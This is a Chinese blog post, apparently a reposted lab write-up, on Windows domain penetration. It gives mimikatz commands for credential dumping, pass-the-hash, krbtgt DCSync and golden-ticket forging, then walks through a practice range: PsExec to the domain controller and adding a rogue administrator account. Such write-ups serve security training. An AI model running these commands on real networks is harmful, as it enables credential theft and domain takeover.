内网渗透(二)

admin 2023年5月1日03:19:24评论35 views字数 1476阅读4分55秒阅读模式

预备知识

什么是域?

域是若干台计算机组成的集合,一个电脑也是。域中的电脑是分等级的,分为域控和成员机。

如何安装域?

在服务器管理中添加服务器角色,添加域服务

如何加入域?

首先一定要修改DNS服务器 ip为域控的ip,再使用域控的账号密码登录就可以加入了,账号的形式 域名/域控账号

哈希传递

当我们使用猕猴桃进行碰撞密码时,我们发现会没有明文出现,是因为高版本的windows是不会将明文密码保存在本机的。所以我们可以使用哈希传递拿取管理员权限。

使用语句:
privilege::debug
log
sekurlsa::logonpasswords
sekurlsa::pth /user: 用户名 /domian “域名” /ntlm: ntlm

提取成功就会跳出获取权限的cmd框

PsExec的作用

能够使用域控的cmd

黄金票据

因为krbtgt账户其实就是那个KDC秘钥分发中心用的超管密码,我们拿着那个的票据,去访问客户机,客户机会认为我们是KDC秘钥分发中心,所以直接给了最高的权限允许我们访问,一般管理员会修改域控机密码,但是很少有管理员会修改Krbtgt的密码

我们通过以下语句来制作黄金票据

lsdump::dcsync /user:krbtgt 获取krbtgt的密码

提取其中的sid(不需要后面的-的数据) 和 hashNTLM

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi (制作票据)

kerberos::ptt administrator.kiribi (加载票据)

然后打开cmd 再利用 PsExec 获取域控cmd

靶场实战

一、远程连接
根据提示:内网渗透(二)

连接:

内网渗透(二)

二、查看目标主机是否在域内
输入:systeminfo
结果:不在域内

内网渗透(二)

三、远程连接10.0.1.8查看是否在域内
输入:systeminfo
结果:在 zkaq.cn的域中

内网渗透(二)

四、查看域控的ip
输入:ipconfig -all(观察dns服务器)
结果:ip为 10.0.1.6

内网渗透(二)

五、使用猕猴桃碰撞10.0.1.8管理员密码
输入:
privilege::debug
log
sekurlsa::logonpasswords
结果:没有明文密码

内网渗透(二)

六、尝试是否能连接10.0.1.6的cmd
通过cmd使用桌面的PxExec
输入:PsExec.exe 10.0.1.6 cmd
结果:登录失败,我们并没有权限

内网渗透(二)

七、使用哈希传递获取权限
输入:sekurlsa::pth/user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
结果:自动弹出cmd框

内网渗透(二)

八、使用弹出的cmd使用PxEsec
先调节路径
输入:PsExec.exe 10.0.1.6 cmd
结果:成功连接上10.0.1.6的cmd

内网渗透(二)

内网渗透(二)

九、创建新管理员
输入:
net user yy yy1233321! /add
net localgroup administrators yy /add
结果:创建成功(忘记截图了)

十、连接10.0.1.6
在CUsersAdministrators.DC桌面中有flag

结果:

内网渗透(二)

(黄金票据一直尝试错误了,就放弃了)

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

内网渗透(二)

原文始发于微信公众号(掌控安全EDU):内网渗透(二)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月1日03:19:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网渗透(二)https://cn-sec.com/archives/1701375.html

发表评论

匿名网友 填写信息